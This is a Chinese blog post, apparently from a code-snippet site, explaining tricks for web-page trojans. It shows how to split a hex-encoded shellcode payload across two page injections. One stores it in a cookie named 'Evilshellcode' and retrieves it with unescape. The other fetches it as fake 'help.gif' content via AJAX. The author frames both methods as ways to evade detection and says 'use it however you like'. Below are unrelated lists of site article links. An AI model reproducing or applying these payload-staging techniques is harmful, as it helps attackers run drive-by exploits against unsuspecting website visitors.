一个网马的tips实现分析


Posted in Javascript onNovember 28, 2010

cookie示例代码:

//存放 
function setCookie(sVar, sVal){ 
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; 
document.cookie = theCookie;} 
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" 
setCookie('Evilshellcode', shellcode); 
//取出 
function getCookie(sVar){ 
cookies = document.cookie.split('; '); 
for(var i = 1; i <= cookies.length; i++){ 
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} 
return ''; 
} 
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> 
var shellcode = $.ajax({ 
url: "help.gif", 
async: false 
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

Javascript 相关文章推荐
location.href语句与火狐不兼容的问题
Jul 04 Javascript
深入理解javaScript中的事件驱动
May 21 Javascript
jQuery之折叠面板的深入解析
Jun 19 Javascript
js 获取元素所有兄弟节点的实现方法
Sep 06 Javascript
本地存储localStorage用法详解
Jul 31 Javascript
JS+Ajax实现百度智能搜索框
Aug 04 Javascript
Vue.js如何实现路由懒加载浅析
Aug 14 Javascript
BootStrap下的弹出框加载select2框架失败的解决方法
Aug 31 Javascript
快速搭建vue2.0+boostrap项目的方法
Apr 09 Javascript
微信小程序利用Canvas绘制图片和竖排文字详解
Jun 25 Javascript
JavaScript中变量提升机制示例详解
Dec 27 Javascript
微信小程序实现组件顶端固定或底端固定效果(不随滚动而滚动)
Apr 09 Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
jquery下将选择的checkbox的id组成字符串的方法
Nov 28 #Javascript
用jquery设置按钮的disabled属性的实现代码
Nov 28 #Javascript
IE6弹出“已终止操作”的解决办法
Nov 27 #Javascript
javascript 获取所有id中包含某关键字的控件的实现代码
Nov 25 #Javascript
You might like
德生PL550的电路分析
2021/03/02 无线电
php引用计数器进行垃圾收集机制介绍
2012/09/19 PHP
对laravel的csrf 防御机制详解,及form中csrf_token()的存在介绍
2019/10/24 PHP
一个js的tab切换效果代码[代码分离]
2010/04/11 Javascript
改进版通过Json对象实现深复制的方法
2012/10/24 Javascript
toggle一个div显示或隐藏且可扩展成自定义下拉框
2013/09/12 Javascript
在javascript中实现函数数组的方法
2013/12/25 Javascript
详解jquery事件delegate()的使用方法
2016/01/25 Javascript
Javascript技术栈中的四种依赖注入小结
2016/02/27 Javascript
node模块机制与异步处理详解
2016/03/13 Javascript
JQuery解析XML的方法小结
2016/04/02 Javascript
浅析BootStrap模态框的使用(经典)
2016/04/29 Javascript
详解JS中的立即执行函数
2017/02/24 Javascript
VUE2.0+ElementUI2.0表格el-table循环动态列渲染的写法详解
2018/11/30 Javascript
Electron-vue开发的客户端支付收款工具的实现
2019/05/24 Javascript
[00:33]DOTA2上海特级锦标赛 CDEC战队宣传片
2016/03/04 DOTA
[47:52]完美世界DOTA2联赛PWL S2 PXG vs InkIce 第二场 11.26
2020/11/30 DOTA
Python的Django框架中TEMPLATES项的设置教程
2015/05/29 Python
Python实现的基数排序算法原理与用法实例分析
2017/11/23 Python
python简单操作excle的方法
2018/09/12 Python
python 使用sys.stdin和fileinput读入标准输入的方法
2018/10/17 Python
scikit-learn线性回归,多元回归,多项式回归的实现
2019/08/29 Python
python中@property和property函数常见使用方法示例
2019/10/21 Python
Pycharm如何导入python文件及解决报错问题
2020/05/10 Python
Selenium环境变量配置(火狐浏览器)及验证实现
2020/12/07 Python
美国高品质个性化珠宝销售网站:Jewlr
2018/05/03 全球购物
材料成型专业个人求职信范文
2013/09/25 职场文书
银行实习生的自我评价
2013/12/09 职场文书
女子职高个人自荐书
2014/02/01 职场文书
学校门卫岗位职责范本
2014/06/30 职场文书
基层干部群众路线教育实践活动个人对照检查材料
2014/09/23 职场文书
2014个人年度工作总结范文
2014/12/24 职场文书
匿名检举信范文
2015/03/02 职场文书
标准发言稿结尾
2019/07/18 职场文书
通过shell脚本对mysql的增删改查及my.cnf的配置
2021/07/07 MySQL
js判断两个数组相等的5种方法
2022/05/06 Javascript